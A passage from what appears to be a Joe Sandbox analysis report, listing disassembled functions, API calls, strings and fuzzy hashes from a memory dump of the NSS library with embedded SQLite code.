                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                      • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                      • Opcode ID: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                                                      • Instruction ID: 7566b953fb5134e0efe5ffc407b7f3cddde754fe5fdc9017ec793f21faddc40b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D514C76B016494FC708CDADDC52BEAB7DA9BE4310F48C23AE842DB785D638E906C751
                                                                                                                                                                                                                                                      Function 6C540F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C541027
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5410B2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C541353
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                                      • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                      • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                      • Opcode ID: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                                                      • Instruction ID: b706ec1af18f49776b24574a5296b55c8148aa7b2aedd4cdbb35940271324d8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E1AF75A08380DFD714CF25C880A6BBBF1AFC6348F14892DE98987B51E771E855CB82
                                                                                                                                                                                                                                                      Function 6C548FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C548FEE
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5490DC
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549118
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54915C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5491C2
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549209
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID: 3333$UUUU
                                                                                                                                                                                                                                                      • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                      • Opcode ID: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                                                      • Instruction ID: f6b5ddcf814d9d77b1de30727796fc655a8d2700ead46186cd8eea8324e8ba86
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5A1A272E001159BDB04CB68CD81BAEB7B9BF88324F0A8129D919B7741E736EC41CBD1
                                                                                                                                                                                                                                                      Function 6C4DBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD48
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD68
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD83
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD9E
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C4DBDB9
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C4DBDD0
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C4DBDEA
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C4DBE04
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C4DBE1E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2721248240-0
                                                                                                                                                                                                                                                      • Opcode ID: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
                                                                                                                                                                                                                                                      • Instruction ID: 903f240ee7ad57ad7270bb0d851cf4e57ecc02f6b71cad16f2afa42c86911af2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E219376E0439A57FF00EA579C63F8F32749B9274FF0A0158E91AAF741E710B41886E6
                                                                                                                                                                                                                                                      Function 6C588D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D14E4,6C53CC70), ref: 6C588D47
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C588D98
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C588E7B
                                                                                                                                                                                                                                                      • htons.WSOCK32(?), ref: 6C588EDB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C588F99
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C58910A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                      • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                      • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                      • Opcode ID: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                                                      • Instruction ID: eb8c0580ef87859266ca774d845ad184403f38d12f5aacbe7b3772044d59c109
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA027A3190B2718FDB18CF19CC6876ABBB3EF82304F19825AD8915FA91C731E949C791
                                                                                                                                                                                                                                                      Function 6C40EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                      • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                      • API String ID: 3168844106-1126224928
                                                                                                                                                                                                                                                      • Opcode ID: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                                                      • Instruction ID: 9dfea458652964e73a28854e03e335769df228a911e7d2507d7915e929b9aedd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3729D70E452058FEB14CF69C480FAABBF1BF49308F1881BDD8159BB52D776A846CB94
                                                                                                                                                                                                                                                      Function 6C529C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A035
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A114
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 717804543-598938438
                                                                                                                                                                                                                                                      • Opcode ID: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                                                      • Instruction ID: 723730643385e7fdf034668f1e6a0bccfa60947a629b804f28fd127659431238
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10228E71608741DFC704CF29C89062ABBE1BFCA344F148A2DE9DA97791E739E845CB42
                                                                                                                                                                                                                                                      Function 6C549D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C408637,?,?), ref: 6C549E88
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C408637), ref: 6C549ED6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C549EC0
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C549ECF
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C549ECA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                                                      • Instruction ID: 2033139a644dabc422c872015ab20d846e2e96aee2537cee0ac1a9855340675d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C681C131B012159FCB04CF6ACD82EDEB3FAAF89304B148529E809AB745E731ED55CB90
                                                                                                                                                                                                                                                      Function 6C557F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5581BC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                      • String ID: BINARY$out of memory
                                                                                                                                                                                                                                                      • API String ID: 2221118986-3971123528
                                                                                                                                                                                                                                                      • Opcode ID: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                                                      • Instruction ID: 0ed5863701637c5c72a672584e089f1493cc2ecf249ea2b58804f8b178949a15
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3352CF71E15218DFDB04CF99C880BADBBB2FF48308F65816BD855AB751D730A856CB81
                                                                                                                                                                                                                                                      Function 6C4D9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4D9ED6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C4D9EE4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F38
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C4D9F0B), ref: 6C4DD03B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4DD04E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C4DD07B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C4DD08E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DD09D
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F49
                                                                                                                                                                                                                                                      • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C4D9F59
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4287675220-0
